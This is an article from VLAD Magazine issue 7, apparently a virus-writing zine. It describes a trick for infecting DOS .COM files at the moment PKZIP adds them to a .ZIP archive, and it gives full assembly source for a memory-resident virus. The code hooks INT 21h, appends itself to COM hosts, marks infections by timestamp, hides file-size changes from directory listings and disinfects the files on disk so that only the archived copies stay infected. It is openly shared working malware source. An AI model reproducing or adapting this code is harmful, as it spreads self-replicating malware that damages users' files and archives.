VLAD Magazine - Issue #7 - ARTICLE.4_1 - Zip Virus

1. ;Lately I've seen some viruses boasting they could infect archivers.
2. ;(Hi Sepultura, didnt you test chaos-ad ???)
3. ;This is quite simple for ARJ etc. But with PKZIP this is quite different,
4. ;due to the way PKZIP gets the size of the files to be compressed.
5. ;Most archivers look for files via INT 21h/ah=4Eh/4Fh.
6. ;Then the file is opened and compressed, no matter whats in the DTA.
7. ;PKZIP looks up filesizes before opening files and stores them somehow.
8. ;Only the filesize in the DTA will be compressed. That means, if a FastInfector
9. ;, infecting on OpenFile, is active, it will NOT be in the compressed file !
10. ;(Well, yes, the header changes are compressed, but the main portion appended
11. ;to the host will be lost).
12. ;
13. ;So the Idea is the following :
14. ;-look for files with extension .ZIP being opened for Read/Write access
15. ; (PKUNZIP opens for readonly)
16. ;-if a ZIP-file is opened, set a flag for enabling infect on OpenFile
17. ;-if a ZIP-File is closed, it is assumed compression is over -> clear flag
18. ;-whenever FindFirst/FindNext occurs and flag is set,
19. ; check if file is infectable; if so,
20. ; increase FileSize in DTA (may do some DirStealth if not)
21. ;-whenever a file is opened, check flag
22. ;-if flag is set, infect file the usual way
23. ;-disinfect when its closed (oly the archived files shall be infected)
24. ;
25. ;Care should be taken not to infect files whose size wasnt increased
26. ;(CRC-Errors, corruption of program), or to increase Filesizes of files
27. ;one will not infect later
28. ;(resulting in CRC-Errors)
29. ;
30. ;
31. ;The following code does it, but it is in NO way optimized.
32. ;Some parts are plain bogus, as the whole stuff is experimental.
33. ;It will infect suitable COMs that are compressed with PKZIP to an
34. ;archive with the extension .ZIP, nothing else.
35. ;
36. ;Routines commented in Italian are with friendly permission of Tankard.
37. ;
38. ;And, ehhmmm, there is a problem with INT 21h/ah=4Eh. Some programs hang
39. ;with this routine active, so i commented it out. (Solutions?)
40. ;
41. ;
42. ;------------------Cut here--------------------------------------------
43. .model tiny
44. .radix 16
45. .286
46. .code
47.     org     100h
48. jumps
49. len             EQU  vir_end-start
50. MCB_Flag        EQU  00h                        ;
51. MCB_Owner       EQU  01h                        ;
52. MCB_Size        EQU  03h                        ;
53. MCB_Name        EQU  08h                        ;
54. MCB_Junk        EQU  05h                        ;
55. COMMAND_LENGTH  EQU  11                         ;
56. EnvPtr          EQU  002ch                      ;
57.  
58. start:
59.           call    Get_Offset
60. Get_Offset:
61.           pop     si
62.  
63.           mov cx,0FCFCh
64.           mov ah,30h            ;get DOS-Version  ;-))
65.           int 21h
66.           cmp ax,0FADEh
67.           je no_install
68.  
69. push si
70. add si,offset flag
71. sub si,offset get_offset
72. mov byte ptr cs:[si],'X'        ;set flag off
73. pop si
74.  
75. ;                  mov sp,si            ;you want a stack ?
76. ;                  add sp,offset vir_end
77. ;                  add sp,200h
78.  
79.           push  cs             ;
80.           pop   ds                                ;
81.  
82.           MOV   BP,SI          ;
83.           push  si
84.           SUB   BP,Offset Get_Offset;
85.           MOV   Cx,00ffh       ; Lunghezza del virus in memoria
86.           CALL  Alloca_Memory  ;
87.           JC    qui1           ; se non c'era spazio a disposizione
88.  
89.           MOV   Di,0100h       ; Copia addesso il virus in memoria alta
90.           MOV   Si,BP          ;
91.           ADD   Si,0100h       ;
92.           MOV   Cx,len         ;
93.           REP   MOVSB          ; Fine Copia
94.  
95.           push    es
96.           mov     ax,3521h
97.           int     21h                      ;Get Int 21 Address
98.           pop     ds
99.           mov     word ptr ds:[offset Int_21],bx      ;Save old Int 21
100.           mov     word ptr ds:[offset Int_21+02h],es
101.           mov     dx,Offset Int_21_Handler
102.           mov     ah,25h
103.           int     21h            ;Set Int 21
104.  
105. qui1:             pop     si
106. no_install:
107. ;restore to host
108. ;rewrite header
109.     mov cx,05h
110.     push cs
111.     pop es
112.     add si,offset header1
113.     sub si,offset get_offset
114.     mov di,0100h
115.     rep movsb                        ;copy header ds:si->es:di
116.     mov di,0100h
117.     jmp di
118.  
119.           mov ax,4C00h
120.           int 21h
121.  
122. COMMAND_STR DB 'TANxxxxxxx',0
123. ;
124. ;----------------------------------------------------------------------------
125.  
126. Int_21_Handler:
127.     cmp ah,3Dh          ;Is open via Handle?
128.     je open_handle
129.     cmp ah,3Eh
130.     je close_handle
131.  
132.     cmp ah,4Fh          ;size is checked beforehand !
133.     je find_file
134. ;        cmp ah,4Eh          ;findfirst
135. ;        je find_file
136.  
137.     cmp ah,12h
138.     je find_file_fcb
139.     cmp ah,11h
140.     je find_file_fcb
141.  
142.     cmp ah,30h          ;residency check, was DOS-Version
143.     je im_here
144.  
145.     jmp     Go_Int_21          ;No, Restore control to Int 21
146.  
147. ;------------------------------------------------------------------------
148. im_here:
149.     cmp cx,0FCFCh
150.     jne go_int_21
151.     mov ax,0FADEh
152.     iret
153. ;------------------------------------------------------------------------
154. find_file_fcb:
155.     pushf
156.     call cs:[int_21]
157.     jc fff_error
158.  
159.     push ax bx cx dx ds es di si bp
160.     pushf
161.  
162.     cmp byte ptr cs:[offset flag],'#'
163.     je no_need
164.  
165.  
166.  
167.     mov ah,51h
168.     int 21h                 ;get DTA
169.     mov es,bx
170.     cmp bx,es:[16h]
171.     jnz no_need
172.     mov bx,dx
173.     mov al,[bx]
174.  
175.     push ax
176.     mov ah,2Fh
177.     int 21h
178.     pop ax
179.  
180.     inc al
181.     jnz standard_fcb
182. extended_fcb:
183.     add bx,07h                      ;extended FCB
184. standard_fcb:
185.     mov ax,es:[bx+17h]              ;get time
186.     and ax,0000000000011111b        ;unmask seconds
187.     xor ax,0000000000010101b        ;is 42 s ?
188.     jnz no_need
189.     sub es:[bx+1Dh],len
190. ;        sbb es:[bx+1Fh],00h
191.  
192. no_need:
193.  
194.     popf
195.     pop bp si di es ds dx cx bx ax
196.  
197. fff_error:
198.     retf 2
199. ;-------------------------------------------------------------------------
200. find_file:
201.     pushf
202.     call cs:[int_21]
203.     jc find_error
204.  
205.     push ax bx cx dx ds es di si bp
206.     pushf
207.  
208.     mov ah,2Fh                  ;get DTA
209.     int 21h                 ;es:bx->dta
210.  
211.     cmp byte ptr cs:[offset flag],'#'
212.     jne dir_stealth                    ;
213.  
214.     mov cx,word ptr es:[bx+16h]        ;get filetime
215.     and cx,0000000000010101b
216.     cmp cx,0000000000010101b           ;is 42s ?
217.     je is_infected
218.  
219.     cmp word ptr es:[bx+1Ah],0EFFFh    ;size, shouldnt be too big
220.     ja is_infected
221.  
222.     push bx
223.     pop di
224.     add di,1Eh
225.     cld
226.     mov cx,0Ah
227.     mov ax,'C.'                   ;search filename for extension .COM
228. find_com_loop:
229. ;dec di
230.     scasw                   ;es:di=ax ?
231.     je loc_01
232.     dec di
233.     dec cx
234.     jnz find_com_loop
235.     jmp is_infected
236. loc_01:
237.     mov ax,'MO'
238.     scasw
239.     jne is_infected
240.  
241. ; is *.COM of right size and time other than 42 sec, prepare for infection !
242.     mov cx,word ptr es:[bx+16h]
243.     and cx,1111111111100000b            ;clear seconds
244.     xor cx,0000000000010101b            ;set 42 seconds (my marker)
245.     mov word ptr es:[bx+16h],cx         ;set time
246.     add es:[bx+1Ah],len                 ;now add virus_size
247.     jmp is_infected
248.  
249. dir_stealth:
250.     mov ax,word ptr es:[bx+16h]
251.     and ax,0000000000010101b
252.     cmp ax,0000000000010101b
253.     jne is_infected
254.     sub es:[bx+1Ah],len
255. ;        sbb es:[bx+1Ah],00h
256.  
257.  
258. is_infected:
259. no_com:
260.     popf
261.     pop bp si di es ds dx cx bx ax
262. find_error:
263.  
264.      retf 2
265.  
266.  
267. ;------------------------------------------------------------------------
268. open_handle:
269.     cmp byte ptr cs:[offset flag],'#'   ;is a file .ZIP open ?
270.     je infect
271.  
272.     push ax bx cx dx ds es di bp si
273.     push ax
274.     push ds
275.     pop es
276.     push dx
277.     pop di
278.     mov al,'.'
279.     cld
280.     repne scasb             ;al=es:di?
281.  
282.     push es
283.     pop ds
284.     push di
285.     pop si
286.  
287.     lodsw                   ;ds:si->al
288.     cmp ax,'IZ'
289.     jne no_zip
290.  
291.     lodsb                   ;ds:si->al
292.     cmp al,'P'
293.     jne no_zip
294.  
295.     jmp set_flag            ;if file of extension .ZIP is opened, set flag
296. no_zip:
297.     pop ax
298.     pop si bp di es ds dx cx bx ax
299.     jmp go_int_21
300.  
301. infect:                         ;flag is set
302.     pushf
303.     call cs:[int_21]        ;open requested file
304.     jc quit
305.  
306.     push ax bx cx dx ds es di bp si
307.     xor bx,bx
308.     mov bx,ax                  ;handle in bx
309.     push bx
310.     mov ax,1220h
311.     int 2Fh
312.     jc quit_sft
313.     mov ax,1216h
314.     mov bl,es:[di]
315.     int 2Fh                     ;get es:di -> sft
316.     jc quit_sft
317.     mov word ptr cs:[offset sft_off],di
318.     mov word ptr cs:[offset sft_seg],es
319.     pop bx
320.  
321.     mov es:[di+02h],byte ptr 02h         ;set open_mode r/w
322.     cmp word ptr es:[di+28h],'OC'        ;is *.COM ?
323.     jne quit
324.     cmp byte ptr es:[di+2Ah],'M'         ;is really *.COM ?
325.     jne quit
326.  
327.     mov cx,word ptr es:[di+0D]           ;get time
328.     and cx,0000000000010101b
329.     cmp cx,0000000000010101b             ;check if infected
330.     je quit
331.  
332.     mov ax,4200h
333.     cwd
334.     xor cx,cx
335.     int 21h                          ;go start of file
336.     jc quit
337.  
338.     mov ah,3Fh
339.     mov cx,05h
340.     mov dx,offset header1
341.     push cs
342.     pop ds
343.     int 21h                          ;read header to buffer
344.     jc quit
345.  
346.     mov cx,05h
347.     push cs
348.     pop es
349.     mov si,offset header1
350.     mov di,offset header2
351.     rep movsb                        ;copy header
352.  
353.     cmp word ptr cs:[offset header1+03h],'##' ; yet  another infection
354. marker ;-))
355.     je quit                          ;already infected
356.  
357.     mov ax,4202h
358.     cwd
359.     xor cx,cx
360.     int 21h                          ;go eof
361.     jc quit
362.     mov f_seg,dx
363.     mov f_off,ax                     ;save eof for JMP
364.  
365.     cmp ax,0EFFFh                    ;if file is too big
366.     ja quit
367.  
368.     mov ah,40h
369.     mov cx,len
370.     mov dx,0100h
371.     int 21h                          ;append to host
372.     jc quit
373.     mov ax,4200h
374.     cwd
375.     xor cx,cx
376.     int 21h                          ;go sof
377.     jc quit
378.  
379.     mov byte ptr cs:[header2],0E9h         ;form jmp
380.     sub f_off,03h
381.     mov ax,f_off
382.     mov word ptr cs:[header2+01h],ax
383.     mov word ptr cs:[header2+03h],'##'        ;infectmarker
384.  
385.     mov ah,40h
386.     mov cx,05h
387.     mov dx,offset header2
388.     int 21h                          ;write header to sof from ds:dx
389.     jc quit
390.  
391.     mov ax,4200h
392.     cwd
393.     xor cx,cx
394.     int 21h                          ;go sof
395.     jc quit
396.  
397.  
398.     mov ax,5700h                        ;get date&time
399.     int 21h                             ;dont want to change it
400.     mov word ptr cs:[offset f_time],cx  ;save time
401.     mov word ptr cs:[offset f_date],dx  ;save date
402.  
403.     mov byte ptr cs:[offset marker],'I'
404. quit:
405.     pop si bp di es ds dx cx bx ax
406.  
407. exit_infect:
408.     iret
409.  
410. ;---------------------------------------------------------------
411. disinfect:                      ;is not zip and no flag
412.     pushf
413.     call cs:[int_21]        ;perform original open
414.     retf 2                  ;one could provide stealth capabilities here
415. ;------------------------------------------------------------------------
416.  
417. set_flag:
418.      pop ax
419.  
420.      cmp al,00100010b               ;is read/write access ?
421.      je zip_rw
422.      cmp al,00100000b               ;is read/only acces ?
423.      je zip_ro
424.      jne no_flag
425. zip_rw:
426.      mov byte ptr cs:[offset flag],'#'
427.      jmp short no_flag
428. zip_ro:
429.      mov byte ptr cs:[offset flag],'@'
430.      jmp short no_flag
431.  
432. no_flag:
433.      pop si bp di es ds dx cx bx ax
434.      jmp go_int_21
435. ;------------------------------------------------------------------------
436. close_handle:
437. ;is *.zip closed ? if yes clear flag
438. ;is no zip and flag is on -> disinfect
439.     push ax bx cx dx ds es di bp si
440.     mov ax,1220h
441.     push bx
442.     int 2Fh
443.     jc quit_sft
444.     mov ax,1216h
445.     mov bl,es:[di]
446.     int 2Fh          ;get sft -> es:di
447.     jc quit_sft
448.  
449.     cmp byte ptr es:[di+28h],'Z'
450.     jne not_zip
451.     cmp word ptr es:[di+29h],'PI'
452.     jne not_zip
453. clear_flag:
454.     mov byte ptr cs:[offset flag],'X'
455.  
456.     jmp quit_sft
457.  
458. not_zip:
459.  
460. ;is zip-r/w-access (flag='#') -> disinfect
461. ;is zip-r/o-access (flag='@') -> no disinfect
462.     cmp byte ptr cs:[offset flag],'#'
463.     jne try_slow_infect
464.  
465.     call disinfect_handle
466.     jmp quit_sft
467.  
468. try_slow_infect:                ;all this is plain stupid !
469.  
470.     mov al,byte ptr es:[di+02h]
471.     and al,00000011b             ;last two bits are (w/o or r/w)
472.     cmp al,00h
473.     je quit_sft
474.  
475.  
476.  
477. quit_sft:
478.     mov byte ptr cs:[offset marker],'N'; .ZIP is closed, so clear flag
479.     pop bx
480.     pop si bp di es ds dx cx bx ax
481.     jmp go_int_21
482.  
483. ;------------------------------------------------------------------------
484. disinfect_handle:
485.     push ax bx cx dx ds es di bp si
486.     xchg ax,bx
487.  
488.     cmp byte ptr cs:[offset marker],'I'
489.     jne quit_d
490.  
491.     push bx
492.     mov ax,1220h
493.     int 2Fh
494.     mov ax,1216h
495.     mov bl,es:[di]
496.     int 2Fh                 ;get es:di -> sft
497.     mov word ptr cs:[offset sft_off],di
498.     mov word ptr cs:[offset sft_seg],es
499.     pop bx
500.  
501.     cmp word ptr es:[di+28h],'OC'        ;is *.COM ?
502.     jne quit_d
503.     cmp byte ptr es:[di+2Ah],'M'         ;is really *.COM ?
504.     jne quit_d
505.     mov es:[di+02h],byte ptr 02h         ;set open_mode r/w
506.  
507.     mov ax,4200h
508.     xor dx,dx
509.     xor cx,cx
510.     int 21h                  ;go sof
511.     jc quit_d
512.  
513.     mov ah,3Fh
514.     mov cx,05h
515.     mov dx,offset header2
516.     push cs
517.     pop ds
518.     int 21h                  ;read header
519.     jc quit_d
520.  
521.     cmp word ptr cs:[header2+03h],'##'     ;check infectmarker
522.     jne quit_d
523.  
524.     mov dx,word ptr cs:[offset header2+01h]  ;read jmp-adress
525.     push dx                          ;save
526.     add dx,offset header1
527.     sub dx,0FDh                 ; = -0100h +03h
528.     xor cx,cx
529.     mov ax,4200h
530.     int 21h                ;set filepointer to original header
531.     jc quit_d
532.  
533.     mov ah,3Fh
534.     mov cx,05h
535.     mov dx,offset header2
536.     push cs
537.     pop ds
538.     int 21h                  ;read original header from virusbody
539.     jc quit_d
540.  
541.     mov ax,4200h
542.     xor cx,cx
543.     xor dx,dx
544.     int 21h                 ;filepointer to start
545.  
546.     mov ah,40h
547.     mov cx,05h
548.     push cs
549.     pop ds
550.     mov dx,offset header2
551.     int 21h                  ;write header to sof from ds:dx
552.     jc quit_d
553.  
554.     mov ax,4200h
555.     pop dx                   ;saved jmp
556.     add dx,03h
557.     xor cx,cx
558.     int 21h                  ;move filepointer there
559.     mov ah,40h
560.     xor cx,cx
561.     int 21h                  ;truncate file at old JMP
562.  
563.     mov ax,4200h
564.     xor cx,cx
565.     xor dx,dx
566.           int 21h
567.  
568.     mov ax,5701h
569.     mov cx,word ptr cs:[offset f_time]     ;set date&time
570.     mov dx,word ptr cs:[offset f_date]
571.     int 21h
572.  
573.  
574.  
575. quit_d:
576.     pop si bp di es ds dx cx bx ax
577.     ret
578.  
579. ;this is with friendly permission of TANKARD (thanx dude)
580. Alloca_Memory PROC NEAR
581.         MOV  Ah,4Ah                     ;
582.         MOV  Bx,0FFFFh                  ; richiedi il numero di blocchi
583.         INT  21h                        ;  del programma ospite
584.         SUB  Bx,Cx                      ;
585.         JB   _lab1                      ;
586.         MOV  Ah,4Ah                     ; modifica il numero di blocchi
587.         INT  21h                        ;  attuali per liberare spazio
588.                         ;  per allocare il virus
589.         MOV  Ah,48h                     ;
590.         DEC  Cx                         ; alloca lo spazio per con-
591.         MOV  Bx,Cx                      ;  tenere il virus
592.         INT  21h                        ;
593.         JC   _lab1                      ;
594.         DEC  Ax                         ;
595.         MOV  ES,Ax                      ;
596.         INC  Ax                         ; fallo stare residente come
597.         MOV  ES:[MCB_Owner],Ax          ;  un prg TSR
598.         MOV  Dx,Ax                      ;
599.         MOV  Ah,26h                     ;
600.         INT  21h                        ; crea nuovo PSP per il blocco
601.                                                                 ;  di memoria
602.         MOV  Di,MCB_Junk                ;
603.         LEA  Si,COMMAND_STR             ; - 06h       ;
604.         ADD  Si,BP                      ; copy nel Memory Control Block
605.         MOV  Cx,COMMAND_LENGTH          ;  la stringa "COMMAND"
606.         PUSH CS                         ;
607.         POP  DS                         ;
608.         REP  MOVSB                      ;
609.  
610.         MOV  Ax,ES                      ;
611.         INC  Ax                         ;
612.         MOV  ES,Ax                      ;
613.         CLC                             ;
614.         RET                             ;
615. _lab1         : STC                             ;
616.         RET                             ;
617. Alloca_Memory ENDP
618.  
619.  
620.  
621. Go_Int_21:
622.     db      0EAh            ;Go On With Int 21
623. Int_21   dd      ?
624. flag db 00h
625. header1 db 0CDh, 20h, 00h, 00h, 00h, 00h ;this is just for this very COM-File
626. header2 db 05h dup (?)                   ; it means INT 20h
627. f_time dw ?
628. f_date dw ?
629. sft_off dw ?
630. sft_seg dw ?
631. f_off dw ?
632. f_seg dw ?
633. marker db ?
634. vir_name db '??'        ;Never named one!
635.  
636. vir_end:
637. end     start